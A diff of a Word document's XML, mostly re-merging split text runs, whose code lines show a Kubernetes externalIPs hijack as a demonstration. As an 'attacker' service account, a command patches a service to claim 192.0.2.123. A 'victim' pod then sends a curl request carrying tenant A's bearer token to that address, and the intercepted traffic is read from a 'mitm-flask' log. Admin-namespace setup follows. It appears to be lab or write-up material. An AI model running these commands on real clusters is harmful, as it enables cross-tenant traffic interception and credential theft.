+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"currency\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>":\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -10090,6 +9964,26 @@
         </w:rPr>
         <w:t>"</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>USD\"}</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>" \</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10101,45 +9995,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b get svc hijack-external-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -o wide</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    http://192.0.2.123:5000/v1/payments'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10152,37 +10015,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b get endpoints hijack-external-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10194,624 +10026,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b patch service hijack-external-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>api</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  --type=merge \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>p '{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"spec</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>":{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>externalIPs</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>":[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"192.0.2.123</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"]}}</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  --as=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>system:serviceaccount</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>:tenant-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>b:attacker</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exec victim -- \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -c 'curl -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -X POST \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -H "Authorization: Bearer $SECRET_DATA_FROM_TENANT_A" \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -H "Content-Type: application/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>json</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>" \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    -</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>d "{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>\"amount\":</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>100,\</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"currency\</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>":\</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>USD\"}</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>" \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    http://192.0.2.123:5000/v1/payments'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n tenant-b logs deploy/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>mitm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>-flask --tail=30</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n tenant-b logs deploy/mitm-flask --tail=30</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10856,25 +10078,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> create namespace security-admin</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl create namespace security-admin</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10898,45 +10109,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -n security-admin create </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>serviceaccount</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> security-admin</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl -n security-admin create serviceaccount security-admin</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10960,25 +10140,14 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>kubectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
